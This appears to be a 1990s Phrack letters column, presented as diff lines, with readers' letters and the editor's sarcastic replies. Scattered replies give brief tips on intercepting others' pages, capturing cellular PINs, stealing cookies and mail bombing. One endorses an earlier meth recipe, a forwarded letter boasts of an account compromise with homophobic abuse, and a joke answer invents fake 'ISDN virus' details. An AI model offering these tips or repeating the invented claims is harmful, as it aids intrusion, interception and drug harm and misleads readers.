+information exchange always was illegal in USSR/Russia). I say
+"rumour" because I have heared it only from one trusted source,
+other information came from several trusted sources
+simultaneously.
+
+BTW, using a PGP is illegal in Russia too, because FAPSI can not
+break the PGP-encrypted messages.
+
+If you find information written above meaningful, you may use it
+in your own discretion but with some precautions -- remember
+that country I live in have barbaric laws and Russian
+Police/Security Services have _absolute_ power to put in jail
+anyone they want without any court or warrant.
+
+[ Normally I strip out all anonymous remailers, because they
+ interfere with the bulk mailing process, bounce mail, and generally
+ screw things up...however, there are always exceptions.
+
+ The FAPSI requirements are extremely interesting to hear about.  It
+ certainly makes sense, and I fear that our country is likewise heading
+ towards that goal.
+
+ If you get the chance, you ought to write more about being a hacker
+ in your country, since I am sure the rest of the world would be
+ fascinated by it. ]
+
+-----------------------------------------------------------------------------
+
+Greetings...
+
+I looking for just a nibble of information...
+
+When one logs into a remote system and gets login and passwords questions 
+how does one write a program to crack a password...
+
+I'm sure that is not an easy question or even a nibble perhaps a byte...
+
+Seeking Info,
+SPY
+
+[ Well, I can't tell you how to write a program to crack passwords
+  without knowing what kind of system you want to crack passwords for.
+
+  I can't tell you how to say "Where is the bathroom" in a foreign
+  language without first knowing what language you want to say it in.
+
+  If you are talking about UNIX passwords, there are already numerous
+  programs written to "crack" passwords.  I would suggest you go poke around
+  and look for programs like "crack" or "killer cracker."  If you
+  can't find reference to either of these on the net, then you really
+  ought to consider finding a new hobby. ]
+
+-----------------------------------------------------------------------------
+
+Wuzup! I have a pager that I don't use anymore because I can't afford the
+bill.  So I was wondering if there is anyway I can hook-up my pager for free
+without going through a paging service.
+
+[ Depending upon the pager, you can possibly change or add capcodes through
+  special programming software.  Almost all Motorola pagers allow you to do
+  this.
+
+  This won't allow you to "really" get free service, but you can piggy back
+  on top of some known person's pager service (or just intercept their pages.)
+
+  The only way to get "free" service is to reactivate the pager's current
+  capcode in the paging system from the local provider who owns the frequency
+  the pager is crystaled for. ]
+
+-----------------------------------------------------------------------------
+
+I was browsing through Issue 47, and saw something that had caught 
+my eye.
+
+ 
+""THE HACKER WAR  --  LOD vs MOD"
+ 
+This t-shirt chronicles the infamous "Hacker War" between rival
+groups The Legion of Doom and  The Masters of Destruction.  The front
+of the shirt displays a flight map of the various battle-sites
+hit by MOD and tracked by LOD.  The back of the shirt
+has a detailed timeline of the key dates in the conflict, and
+a rather ironic quote from an MOD member."
+
+A few weeks ago, I read the book Masters of Deception, a book about
+the "war".  Wasn't the name of the rival group Masters of Deception?  
+I assume that Erik would know, he appeared to be the main "villain" in 
+this version of the story.  Any response would be appreciated.
+
+
+[ I was the villain?  Well corn my pone.
+
+  In any case, you should always take everything you read with a grain of
+  salt.  In my opinion, the book was a piece of shit.  Since many of the
+  MOD members decided to viciously attack the author, Josh Quittner, posing
+  as the ILF, I can only assume that they felt likewise.
+
+  So you decide for yourself about all that.  Oh, and buy the damn
+  t-shirt.  http://www.fc.net/phrack/shirts.html ]
+
+-----------------------------------------------------------------------------
+
+
+Hi Can you teach me to be a hacker i think that that would be cool so what do
+you think can you teach me to be a hacker and to be cool you are one of the
+biggest hackers in the world
+
+[ No, I'm afraid as one of the biggest hackers in the world, I'm far too
+  important to expend any energy on the likes of you.
+
+  Now go back to your PlayStation and get better at Toshinden. ]
+
+-----------------------------------------------------------------------------
+
+
+Where culd i find some zipped red box tones? Or blue box.
+CyberOptik
+
+[ Make your own tones with the Blue Beep program.
+
+  Follow some of the links from the Phrack Home page, and you should
+  find this program on any number of sites. ]
+
+-----------------------------------------------------------------------------
+
+Hallo, din Gamle rn!!
+(Norwegian for: Hello, you Old Eagle!!(direct.translated.)
+(rn(Eagle) is pronounced like: earn ) End of Norw. lesson.
+
+This is a question from one viking to another; I am a newbie in the H/P
+division so I spend my days(and nights!) dwnloading all i can find about the
+subject. But I do have some problems with the cellular phone system over
+here, NMT 900. Which your system AMPS have stolen all the good parts from!
+Untill last year i could program my cellular phone, Ericsson NH 99, by
+programming and switching the 27c512 prom. But now the norwegian
+telecompany Telenor Mobil has inserted pin codes, i.e. if my cellular phone
+number used to be 12 34 56 78 (we have 8 digits), then my phone number now
+has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the
+owner of the phone.
+
+I do have programs and cables for programming the phone with all 8+3 digits,
+but then I have to know the 3 digits, the pin code, and I do NOT know how
+to download them from the cellular traffic going around my place. Can you
+help me beat the system? How do I dwnload the pin code???? I read that they
+are going to use the same system i the N.Y. area within this year, so someone
+is going to ask you these qst. sooner or later. Be prepared! Or is my qst.
+old news? Maybe everyone knows how to do this? Exept the norwegian newbie....
+
+Vennlig hilsen
+(thats:Best regards)
+
+Stian(Mr.Phonee) Engerud
+
+[ I'm not sure I understand how the last 3 digits can be unknown to the
+  owner of the phone.  If your number changes, then obviously you have to
+  know the new number.  Are you sure this isn't just a touch-tone PIN
+  entered in when you use phone, like systems over here in the states?
+
+  If it is, then you'll still need some kind of ESN reader, or other means
+  to decode the reverse channel, and a 900 mhz-capable radio and a touch-tone
+  decoder to grab the PINS as well.  It's incredibly annoying.
+
+  On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems
+  in place.  Have they upgraded their ETACS systems as well?  If not,
+  use those. ]
+
+-----------------------------------------------------------------------------
+
+From: zadox@mindspring.com (Ron Zalkind)
+Subject: Phrack Magazine: Strategic Marketing Partnership
+
+I'm one of the principals of a new Internet-based, second-generation,
+Information Technology service. This new Internet service debuted last week
+at the Culpepper Forum in Atlanta. I'd like to propose a strategic marketing
+partnership with Phrack Magazine. This proposal will spell out what it is
+our service does (including a product demo), how we think a partnership with
+Phrack Magazine might work, and how we can all increase profits by doing so.
+Please reply to this E-mail with the name and E-mail address of the
+'director of online strategy', or the 'circulation director', for Phrack
+Magazine. Thank you.
+
+Ron Zalkind, President
+R.E. Zalkind & Co. Inc.
+Voice: 770-518-1600
+Fax: 770-642-0802
+E-mail: zadox@mindspring.com (Ron Zalkind)
+Ron Zalkind
+
+[ WOW!  I can't wait to hook up with THESE incredibly savvy people
+  so Phrack can dramatically increase our profits.  Let's see, if we
+  make any money, we'll see a 100% increase!  It's a no-lose
+  situation.
+
+  Man, I hate Internet mass-mailers.  Don't these people attempt to qualify
+  their leads even a LITTLE?  Strategic Marketing Opportunities with
+  free computer hacker magazines?  Ron? Hello? ]
+
+-----------------------------------------------------------------------------
+
+
+   First of all, great work on the 'zine all these years, hope to see 48
+soon. 
+ 
+   I have an article from "Airman" magazine (I believe it was the April
+1996 issue), the US Air Force magazine given to military members.  It
+details the efforts of AFOSI (Air Force Office of Special Investigations)
+to prevent hackers from breaking in to military computers.  Considering
+it's coming from the military, it's not too badly written (the author
+actually knew the difference between "crackers" and "hackers").  I don't
+have a scanner, but I'd be more than willing to snail mail it to you.  I
+just wanted to check and see if you guys already had it of not.  If you
+don't, let me know, and I'll get it to you ASAP. 
+ 
+   Keep up the good work....
+
+[ We would definately like to see the text from this article.  Please
+  forward it!
+
+  In fact, if any of you readers ever come across ANYTHING you think is cool,
+  email it to us, or snail mail it.  We love getting mail.
+  We will print anything cool.  (And a lot of lame things too!)
+
+  Just stop sending us credit histories and password files.  :)  ]
+
+-----------------------------------------------------------------------------
+
+need access to w.gov xxx now
+
+[ w.gov?   Uh, ok, let's see:
+
+  Reserved Domain (W-GOV-DOM)
+
+     Domain Name: W.GOV
+
+     Administrative Contact, Technical Contact, Zone Contact:
+           Internet Assigned Numbers Authority  (IANA)  iana@isi.edu
+                 (310) 822-1511
+
+     Record last updated on 02-Dec-93.
+        Record created on 01-Dec-93.
+
+
+  Do you know what this means?  Duh. ]
+
+-----------------------------------------------------------------------------
+
+From: health@moneyworld.com
+Subject: Scientific Discoveries Minimize Aging (DHEA)
+
+http://dhea.natureplus.com
+
+Take advantage of the amazing benefits of DHEA. In the search for the 
+FOUNTAIN OF YOUTH, DHEA is a must README. People, age 70, feeling and 
+acting 25.
+
+Read the medical research  at  http://dhea.natureplus.com .A quote from 
+an article published by the New York Academy of Science written by Dr. 
+S.S.C.YEN; 
+  "DHEA in appropriate replacement doses appears to have remedial effects 
+   with respect to its ability to induce an anabolic growth factor, increase 
+   muscle strength and lean body mass, activate immune function, and enhance 
+   quality of life in aging men and women, with no significant adverse effects."
+
+Regain the eye of the tiger! Don't wait ! Click on:  http://dhea.natureplus.com
+
+To terminate from the Health Catalog, Reply to health@moneyworld.com with
+"remove" in the subject field. Bob Williams 206-269-0846
+
+P.S.  You will find a full line of Vitamin, Supplements and OTC Health 
+Catalog at http://natureplus.com.
+
+[ Yet another Mass mailing!  How many lame mailing lists are we on?
+  You have to wonder about these things.
+
+  But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH!
+  I need to get me some of that.  A little DHEA, a little GHB, a little
+  DMT, and you'll look younger, feel younger, and have the brain of
+  a two year old.
+
+  And besides, Jesus loves acronyms. ]
+
+-----------------------------------------------------------------------------
+
+Do you listen to 2nur radio?  If so have you ever heard a band named
+SOYLENT GREEN or GOITER on any of their shows?
+please email me back
+thanx,
+Nick
+
+[ Nick, I hate to break it to you, but:
+
+  SOYLENT GREEN IS PEOPLE!!!
+  IT'S PEOPLE!!!!! ]
+
+-----------------------------------------------------------------------------
+
+From: Pete Shipley <shipley@dis.org>
+To: best-of-security@suburbia.org, cert@cert.org, cudigest@sun.soci.niu.edu,
+        daddict@l5.com, dc-stuff@fc.net, dtangent@defcon.org,
+        emmanuel@2600.com, grayarea@gti.gti.net, letters@2600.com,
+        mycroft@fish.com, phrack@freeside.fc.net, phrack@well.sf.ca.us,
+        proff@suburbia.org, root@iss.net, root@l0pht.com, root@lod.com,
+        root@newhackcity.com, spaf@cs.purdue.edu, strat@uu.net,
+        will@command.com.inter.net, zen@fish.com
+Subject: Shipley owned, hacked and thrashed
+
+
+Please distribute this letter freely:
+
+This posting is being made from dis.org, and this is not forged e-mail.
+Even though this mail is coming from Peter Shipley's account, I am not him.
+
+Who am I?
+
+That is unimportant except to say that I cannot take anymore of the
+"DoC" crowd's BULLSHIT.  I would like to raise an issue with them, mostly
+(but not all related to the incident at defcon).
+
+To you drunken losers at defcon who had to fuck with Netta's speech (DoC
+on hold here for a second, it wasn't just them):  If you didn't want to hear
+Netta's speech (though in your opinion it may be monotone, boring or even
+wrong) you DIDN'T HAVE TO STAY AND LISTEN TO IT.  There were some people that
+WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST
+ASSES.  How different are you now from a government that would like to 
+enforce censorship upon it's own people?
+
+All I can say is "getbacks are a bitch".  A few things to consider:
+
+1.	Shipley is an utter tool.  His whole appearance is a front.  If he's
+such an awesome security specialist then why was he so easily owned?  Also
+I bring into question some of the motives he has for harassing Netta Gilboa.
+Her boyfriend (who is currenlty in jail) was known for continually hacking
+(yes CONTINUALLY hacking) Peter Shipley.  I know this because I spoke with
+Chris (n00gz) many times and was aware of this fact.
+
+In my opinion Petey, anyone that is foolish enough to hire you to secure their
+systems are idiots; whether it's the military, government, industry, a
+business -- they should all just ask for their money back. You are a discredit
+to your profession.
+
+2.	Shipley is a coward.  Only cowards attack people weaker than them
+but back away from a confrontation with someone of equal size or power.
+Careful Peter -- next time don't piss off Bootleg, he might hurt that pretty
+boy face of yours (though I admit, I would like to see it)
+
+3.	Hackman was a gob of shit.  Peter Shipley has come to know his true
+calling in life now (to wit: Webmaster).
+
+4. 	The fangs make you look like a homo.  Maybe you are (nothing against
+them actually, just stating a fact).
+
+Shipley, se7en, (ayoung, where's your piglet account?).  Get a fucking life.
+Maybe instead of contstantly going around "Searching for intelligent life"
+perhaps you should stay home and secure your own systems.  You are all owned,
+now don't you feel stupid?  You should.  You are.
+
+DIS.ORG == DISORGANIZED.
+
+-- galf@upt
+
+[ This is almost funny.
+
+  Notice I said, almost.
+
+  You have to admit though, Shipley always comes with some damn fine
+  women in tow.  Oh the things I did in my mind to that blonde...
+
+  Something tells me that the author of this forged message could use a lot
+  of Shipley hand-me-downs:  Women, contracts, references, etc... ]
+
+-----------------------------------------------------------------------------
+
+
+Hey, I just watched the movie Hackers, and I was just curious to know if They
+used you and the LOD to models the characters in the movie after? Alot of the
+handles, and choice phrases they used  sounded awfully Farmiliar with what
+went on, or at least what the book said went on. 
+
+Meds:}
+
+[ Actually, meds, the screenwriter hung around with "MOD" and other people from
+  the New York hack scene and picked up some pointers, and then used
+  people like Dead Lord and Emmanuel Goldstein as technical assistants.
+
+  Or something like that.
+
+  Please, don't ever associate "LOD" with this piece of shit again.  :) ]
+
+-----------------------------------------------------------------------------
+
+A lot of people have read the article about Joe Engressia and his time in
+Memphis where he was arrested by the police and banned from his dream of
+working on phone lines.  Well, at the time when he was living on Union
+avenue, my mother was in charge of payroll, hiring and the like at a local
+switchboard. This was back in 1972 when the phone system was less of the
+fuqup it is today.  Well, a friend of my mother's taught Mr. Engressia how to
+cook and other related houshold things despite his handicap.  Shortly after
+or before this, (I am unsure) he was arrested by the police.  I think this
+was also about the time the interview was made.  Anyway, the local phone
+companies would not touch him, not even to give him service.  My mother,
+after talking with him decided to hire him as a phone consultant. (Her
+opinion of his was that "He was so brilliant, it was scary, I mean REALLY
+scary.")  She though he was a great "kid" (22 at the time) and was the best
+consultant that they had.  He worked there for three years before moving.
+
+ The last my mother heard was that he was living in a Denver high rise
+working as a consultant to a corporation or something out there.  I only just
+started talking with my parents about this today, but I am sure that they
+will tell me more of him. 
+
+   Oh, and my father was good friends of Joe too, he and Joe were Ham Radio
+operators here in Memphis and my father still phreaks on them so I am sure
+that Mr. Engressia does too.  Anyway, my father is teaching me how to hack,
+and my mother is teaching me how to phreak, but she only knows a little of
+outdated info and wants to get in touch with Joe.  If anyone, ANYONE has any
+information about Joe, or if somehow this article gets to Joe, please let me
+know at the following e-mail address:
+Kormed@aol.com. 
+
+
+[ We used to call Joe on conferences a long time ago.  I could probably
+  dig his contact information up, but I really doubt he'd appreciate his
+  number being published in Phrack.
+
+  Hell, if your parents are teaching you how to hack & phreak, then certainly
+  they can find Joe.  He was always listed in Directory Assistance when
+  we tracked him down years back.
+
+  Have you even really looked for him?  ]
+
+
+-----------------------------------------------------------------------------
+
+quick question For Bloodaxe.
+
+Ok, I know you probably get this Alot,but I just have to ask?...
+
+Did you Really Date Christina Applegate?
+
+had to ask,
+
+[ Man, now that is a rumor that I would love to have started myself.
+  No.  Never dated her, never met her, never talked to her, never
+  had any contact whatsoever.  Spent some time holding up some of her
+  posters with one hand, but that's about it. ]
+
+-----------------------------------------------------------------------------
+
+do you have any info on stealing magic cookies ??
+
+
+[ No, but I can trade you these magic beans for your cow.  If you plant
+  them they will grow high into the sky, towards the castle in the clouds
+  where the giant lives with the talking harp and the goose that lays the
+  golden eggs.
+
+  Go read some of the WWW Security Lists, if you're talking about what
+  I think you are.  There are also javascript routines that collect
+  navigator cookies from clients hitting your page.  After briefly looking
+  around, I can't find the specific sites to snarf them from.  Go do a
+  webcrawler search for WWW security or javascript security. ]
+
+-----------------------------------------------------------------------------
+
+Dear Phracks - I'm a Free Journalist from Germany and I'm going to write
+an articel about ISDN and the possible danger which might happen to a 
+company etc. getting hacked by some agnets, spies etc. from other 
+countries. So I'm looking for indos about ISDN-Viruses, Hackers and
+background infos.
+
+Can you help me?
+
+[ Wow, a "Free Journalist."  I thought that pesky national socialist party
+  imprisoned all you guys.
+
+  ISDN Viruses are quite possibly the worst thing to happen to computing
+  since the creation of the Cellular Trojan Horse.  Basically, these viruses
+  travel over the wires using the X.224 transport protocol, and seize the
+  D channel using Q.931.  All SS7 data sent over the D channel is quickly
+  compromized and re-routed to different signal transfer points, causing
+  massive ANI Failure over the entire routing mesh.
+
+  Rumor has it that the Internet Liberation Front was behind these viruses
+  with heavy investement coming from the German Bundesnachrichtendienst's
+  Project Rahab.  These hackers were paid with AT&T calling cards encoded
+  with a polymorphic encryption scheme, and cocaine.
+
+  You can quote me on this. ]
+
+-----------------------------------------------------------------------------
+
+Well, i wanna make an offer, and a nice deal.
+i am n editor in an H/P/C magazine of HFA ( universal H/P/C 
+group..)
+well, what i wanna offer is a joining both of the papers 
+2gether, OR! u want more subscribes, we'll publish ya,
+but adding 1 article from ya'r paper, saying from where it is.
+so, if we can make this deal, contact me asap!
+10x.
+
+[ Let me see if I understand this, your "universal H/P/C group" has
+  a magazine, and wants to do "Phrack" the great honor of merging
+  with us, or printing our articles?  Wow.  What a deal.  You mean
+  by linking up with you guys, we will hit a greater audience
+  "universally?"
+
+  So, merging our roughly 10,000 direct email subscribers, and a roughly
+  75,000 more WWW or misc. readers, adding in your readers, that should
+  bring us up to 85,001 readers!  Universally!  FAN-FUCKING-TASTIC!
+
+  Are there so many rocks for you people to crawl out from under?
+  Sheesh! ]
+
+
+-----------------------------------------------------------------------------
+
+Hello,
+
+
+I have a need for a network sniffer.  Specifically, one that will
+sniff IEEE-802.3 packets and TCP/IP packets.  Any leads?
+
+
+[ Well, gee, are there network sniffers that won't?
+
+  Go do an archie search for tcpdump. ]
+
+-----------------------------------------------------------------------------
+
+I was just strolling by you page: http://freeside.com/phrack.html,
+and found my link "Showgirl Video" (link to vegaslive.com).
+
+I am the creator and webmaster for the site. If I can ever be
+of assistance to you let me know.
+
+We are one of the few sites in the world that has a live stage and
+live 1 on 1 conferencing in one place.
+
+john...
+
+[ Ya know, every time I'm in Vegas I make it out to Showgirl Video with
+  a bucket of quarters and a healthy dose of bad intent.  I have to
+  congratulate you guys for going on-line.  I love it when two of
+  my favorite things come together (smut and computers).
+
+  Unfortunately, The Vegaslive site is kind of pricey.  You guys seriously
+  need a flat fee.  I suggest you look at a SUPURB site:
+  http://www.peepshow.com
+
+  That place has a flat fee, all you can eat pricing structure, the way
+  God meant it to be.  Take note, and follow suit. ]
+
+
+-----------------------------------------------------------------------------
+
+I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the 
+passw: 2697435 ...I need the passw to have access to SCAN or TAC 
+function ...please, help me!
+
+Thank
+Regards
+
+[NCG]
+
+[ I'm not familiar with that phone, but I'd start off looking through
+  Dr. Who's archive of cellular info at:
+
+  http://www.l0pht.com/radiophone
+
+  If what you are looking for isn't there, there might be a link to
+  somewhere that has it. ]
+
+-----------------------------------------------------------------------------
+
+my name is azreal! I am also known as the angel of death.  why did you sell
+out to the feds back when you running comsec.  i think phiber optick was a
+great guy and i would have been glad to work with a legend.  do you know his
+e-mail adress
+azreal
+
+[ Azrael?  The Angel of Death?  I thought Azrael was Gargamel's annoying cat.
+
+  But to answer your question, I sold out to the man ages ago for money.
+  Pure and simple.  Once you hit puberty, you might have a need for cash.
+  Once mommie sends you off to college, you might need it even more.  And
+  in the distant future, when you get out on your own, you will really
+  know.
+
+  Yes, phiber is swell.  There have been good pictures of him in many
+  national magazines.  Try not to get the pages stuck together.
+
+  And, yes, I do know his email address.  Thanks for asking! ]
+
+-----------------------------------------------------------------------------
+
+From: prodigy.com (MR MARK P DOLESH)
+
+How do you hack?
+
+[ Very carefully. ]
+
+-----------------------------------------------------------------------------
+
+Did you ever write a edition that deals with breaking the screensavers
+code?  If so which one?  How about breking the Win95 password.  You know
+the one that allows you into Win95?
+
+[ We pass all articles about breaking Windows Screen Savers on to
+  the more technical forum at 2600 magazine.
+
+  To disable the Win95 password, install Linux. ]
+
+-----------------------------------------------------------------------------
+
+A phriend of mine showed me your sight a few days ago at his house...I 
+thought it was pretty cool.  I dloaded a few issues and stuff to check 
+out...I haven't been on the internet to long so I'm still trying to phined 
+more stuff that interest me,  and I would like to set up my own page like 
+that but my account is thru the school...Is there anyway around that?  So 
+it can be like border line legal?  How underground can one go???  If you 
+still have the file on where the line is please send them...Thanks.
+
+[ Your account is through your school, but you are looking for a way around
+  that?  Hmmm...let me see.  I'm just going to throw out something wild
+  and crazy, but, what the hell:  Maybe, get another account through
+  another Internet provider?  I know, it's just too outlandish.  Forgive
+  me for being so zany.
+
+  How underground can you really go?  I used to have that file you are looking
+  for, but I was so underground at the time, it got soiled with mud and
+  disintegrated, eventually polluting the water table, and was ultimately
+  drank by the city of Pasadena, Texas. ]
+
+-----------------------------------------------------------------------------
+
+In regards to volume one ,issue four , Phile #8 of 11 ...
+This shit has got to be a joke , I tryed to make some and 
+Was a great dissapointment ????
+
+[ The meth recipe works just fine.  Obviously you DIDN'T try to make it.
+  If you feel like a REAL MORON, look at the cat recipe in the line noise
+  section of this issue.  Stay up for a week, go into deep amphetamine
+  psychosis and die!  Woo Woo! ]
+
+-----------------------------------------------------------------------------
+
+I ve tried to locate these guys who have Black book for cracking 
+passwords in major software and some games as well.They go by the Names 
+of Jolly Reaper and Maugan Ra aka Manix.Iam doc X from London (not a 
+pig!!!) if U happpen to know these doodez let us know.TA from GB
+
+[ Perhaps you have Phrack confused with something having to do with
+  pirated software.  I'd ask that question in a posting to the USENET
+  group alt.warez or on the IRC #warez channels. ]
+
+-----------------------------------------------------------------------------
+
+Eric,
+   i have been searching the internet for some kind of script that
+will subscribe a certain email address to a shitload of
+mailing lists...i have heard of such a thing.
+what im lacking is that keyword to search for such as:
+
+   bombard
+   attack
+   flash
+
+what is the technical term for this kind of attack?
+or better yet, do you know where to get a hold of such a script.
+im not familiar with mailing lists and id rather not spend the time
+researching the topic...but i need vengeance quickly :-)
+
+any help appreciated,
+-roger
+
+[ The name for this type of attack?  Uh, an email bomb?
+
+  But let's take a closer look at your mail:
+
+  "id rather not spend the time researching the topic...but I need vengeance
+   quickly"
+
+  I'm not going to be your fucking research assistant, or your accomplice.
+  If you can't figure out how to look through our back issues to find any of
+  the tons of fake mailers we've printed, or figure out how to automate them
+  using shell script, then you don't deserve to live, much less
+  get your speedy vengeance.
+
+  Couldn't you even come up with a NON-LAME way to get back at someone?  Hell,
+  even rewriting their .login to say "exit" or something silly like that is
+  more clever, and less cliche, than flooding their inbox. ]
+
+-----------------------------------------------------------------------------
+
+    The art of " information manipulation " has possessed my virgin soul ! I
+turned into a fuckin' 2-year old (drool and all) when experiencing the free
+local call system involving a paperclip . All I've been thinking is hack,
+haCK, HACK ! I'm still drenched behind the ears but I'm a patient, turbo
+learner (whatever the hell that means) !
+
+     Here's the problem: I possess some info that could make you smile so
+big, that your sphinctor would unwrinkle. I would like to experiment, if you
+will . Perhaps, dabble with this stuff , but I am very uneducated in raping
+mainframes. This could be a major wood producer 
+because my EX works at this establishment .
+
+     I need a trustworthy pro who possesses a plethora of tasty tactics . Whic
+h way to the Dagobah System.....I seek YODA !!
+                                                      
+[ Drooling 2-year old.
+
+  Very uneducated in raping mainframes.
+
+  Major wood producer.
+
+  Well, gee, I'm sure your info would make my "sphinctor" unwrinkle, but I'm
+  wearing a new pair of jeans, so I guess I'll have to take a rain check.
+
+  God bless AOL for bringing the internet to the masses! ]
+
+
+-----------------------------------------------------------------------------
+
+i want to be added to your list. and could you send me unziped hacking 
+software or can you tell me how to unzip softwarre nd a beginners guide 
+to hacking. i would appreciate it i want to begin fun new field of 
+hacking thank you
+
+[ You want to learn all about hacking, but you don't know how to unzip
+  files?
+
+  Crawl before you run, Kwai Chang. ]
+
+-----------------------------------------------------------------------------
+
+VA'CH CO' TAI
+
+Anh Ta'm ddi du li.ch xa, ngu? ta.i mo^.t kha'ch sa.n.  DDa~ ma^'y 
+tie^'ng ddo^`ng ho^` ro^`i anh ngu? kho^ng ddu*o*.c vi` tie^'ng cu*o*`i 
+no'i huye^n na'o tu*` pho`ng be^n ca.nh vo.ng sang.  Ro~ ra`ng la` ho. 
+ddang dda'nh ba`i, sa't pha.t nhau a(n thua lo*'n.
+
+Ra'ng nhi.n cho to*'i 3 gio*` sa'ng va^~n cu*' tra(`n tro.c hoa`i, anh 
+Ta'm chi.u he^'t no^?i, be`n go~ nhe. va`o va'ch dde^? nha('c khe'o 
+pho`ng be^n ca.nh.
+
+Anh Ta'm vu*`a go~ xong la^.p tu*'c anh nghe mo^.t gio.ng tenor he't le^n 
+tu*` pho`ng be^n:
+
+-  Tro*`i o*i!  Co' bie^'t ba^y gio*` la` ma^'y gio*` sa'ng ro^`i 
+   kho^ng?  O*? ddo' ma` ddo'ng ddinh treo hi`nh!
+
+-  ?!?!?
+
+[Uh, let's see...No Boom Boom with soul brother.  Soul Brother too beaucoup.
+
+ Ddi Ma'o.]
+
+-----------------------------------------------------------------------------
+
+
+Hola me gustaria tener mucha informacion de lo que ustedes hacen sobre 
+todo de como lo hacen. Es decir que me manden informacion de los secretos 
+de los sistemas operativos de internet  de todo lo que me puedan mandar.
+  yo soy universitario, y me gusta todo lo relacionado con redes.
+
+Muchos saludos.
+Contestenme.
+
+
+[ What is this, International Day?
+
+  !Si quieras mucha informacion, LEA MUCHOS LIBROS!  !DIOS MIO!  !No estoy
+  el maestro del mundo!  Ehehe, esta fue solomente una chiste.  No esta
+  nunca libros en espanol sobre <<computer security>>.  Que lastima.
+
+  If you want to learn, start with english...then go buy the entire O'Reilly
+  Yellow series and Blue series.  That will get you started learning
+  "los secretos de los sistemas operativos de internet." ]
+
+-----------------------------------------------------------------------------
+
+From: "Erik K. Escobar"
+Subject: Apology
+
+This letter is to be forwared to the newsgroup io.general by madmagic, in 
+care of Mr. Escobar. 
+
+I would like to send a public apology to Internex Online for the 
+treatment I have given the staff and users of this system.  I threw 
+around some threats and words that can incriminate me, and realized that 
+it was a stupid idea on my behalf.  In the last week or so with the 
+negative attention I have gotten, I got to know the IO/ICAN staff a bit 
+better and everything in good standing. Me and Internex Online are now 
+even and there will be no retaliation or sour words from me. I just want 
+everything to go back to the norm.
+
+Erik
+
+[ * AND THEN * ]
+
+
+From: "Erik K. Escobar"
+Subject: Shit
+
+As my understanding, A letter of apology under my name was redistributed 
+around within my mailing list and whatever.  As some of you know, myself 
+and Zencor have been having problems with Internex in the past and near 
+the middle of this week, I got into a large battle with was ACC, ICAN, 
+and Internex Online -vs- Me.  It is stupid to get into an argument with 
+that many corporations, and a few words and threats were thrown, they 
+locked my account.  I wrote a letter in response of that and they 
+proceded to lock other Zencor staff accounts and hack our web site. Also 
+they posted the letter in the news groups and whatever.  They eventually 
+decided to charge me and whatever, and to save me time outta the courts 
+and crap like that I made an apology for the threats, seeing that they 
+could incriminate me.  Internex has done wrong and I probably won't be 
+seeing alot of apologies coming my way. If they didn't have certain info 
+about me..they could have me very well laughing at them but that is not 
+the case.
+
+Erik
+Lord Kaotik
+[ ZENC0R TECHN0L0GIES ]
+
+
+[ Can you say, LAME? ]
+
+-----------------------------------------------------------------------------
+
+Been trying to locate for some time the file, plusmap.txt that used to be on
+the phrack bbs (716-871-1915).  This file outlined information regarding the
+videopal in the videocipher II plus satellite decoder module.  Any idea where
+I might find this file?
+
+
+[ I didn't know there was a "phrack" bbs.  <Sigh>
+
+  In any case, I would look for information regarding this on the following
+  sites:
+
+  http://www.scramblingnews.com
+  http://www.hackerscatalog.com
+  http://ireland.iol.ie/~kooltek/welcome.html
+
+  Satellite Watch BBS : 517-685-2451
+
+  This ought to get you in the right direction. ]
+
+-----------------------------------------------------------------------------
+
+Hi,
+
+Just a quick note to tell you about the Hawaii Education Literacy Project -
+a non-profit organization - and our efforts to promote literacy by making
+electronic text easier and more enjoyable to read.  Given that we're both in
+the reading biz, I thought you might be interested.
+
+ReadToMe, our first program, reads aloud any form of electronic text,
+including Web pages, and is free to anyone who wishes to use it.  
+
+The "Web Designers" section of our home page tells you how your pages can
+literally speak to your audience.  Actually, all you need to do to make your
+pages audible is to add the following html code:
+
+<P><A HREF="http://www.pixi.com/~reader1/readweb.bok">Hear
+This Page!</A> Requires ReadToMe Software... Don't got it? <A
+HREF="http://www.pixi.com/~reader1">GET IT FREE!</A>
+</P>
+
+A beta test version of the program can be obtained from
+http://www.pixi.com/~reader1.  I encourage you and your readers to download
+a copy and take it for a spin.  
+
+Thank you for your time,
+
+Rob Hanson
+rhanson@freeway.net
+Hawaii Education Literacy Project
+
+
+[ Honestly, I don't know if this is a spam to a list of magazine people, or
+  really a phrack reader.  I have this thing about jumk email, and the joy of
+  offering that info to our thousands of bored hacker readers looking for
+  an excuse to fuck with some system.
+
+  I'll let them decide if this was a spam.  Thanks, Rob. ]
+
+-----------------------------------------------------------------------------
+
+********************************
+SYNTHETIC PLEASURES  opens in the US theaters
+********************************
+save the date, spread the word. forgive us if you got this before.
+
+-----------------------------------------------------------------------
+eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through
+the perfectly artificial worlds of cyberspace, plastic surgery,
+mind-altering chemicals and controlled, man-made environments that
+questions whether the natural world is redundant, or even necessary. those
+who see it will want to pinch themselves when it's over.
+(janet maslin- The New York Times)
+------------------------------------------------------------------------
+
+for further info contact:
+caipirinha@caipirinha.com
+http://www.syntheticpleasures.com
+
+first opening dates:
+
+Aug 29 Los Angeles, CA- Nuart Theatre
+Aug 30 San Francisco, CA- Castro Theatre
+Aug 30 Berkeley, CA- UC Theatre
+Aug 30 San Jose, CA- Towne Theatre
+Aug 30 Palo Alto, CA- Aquarius Theatre
+Aug 30 Portland, OR- Cinema 21
+Sept 13 San Diego, CA- Ken Theatre
+Sept 13 NYC, NY- Cinema Village
+Sept 13 NYC, NY- City Cinemas
+Sept 13 Larkspur, CA- Larkspur Theatre
+Sept 20 Boston, MA- Kendall Square Theater
+Sept 20 Cleveland, OH- Cedar Lee
+Sept 20 Philadelphia, PA- Ritz
+Sept 22 Vorheess, NJ- Ritz 12
+Sept 27 Austin, TX- Dobie Theater
+Sept 27 New Haven, CT- York Theatre
+Sept 27 Pittsburgh,PA- Rex
+Oct 4 Washington, DC- Key Cinema
+Oct 11 Providence, RI- Avon Theater
+Oct 11 Kansas City, MO- Tivoli
+Oct 11  Baltimore,MD - Charles Theatre
+Oct 18  Waterville MA- Railroad Square
+Oct 18  Durham,NC - Carolina Theater
+Oct 18 Raleigh, NC - Colony Theater
+Oct 18 Chapel Hill,NC -The Chelsea Theatre
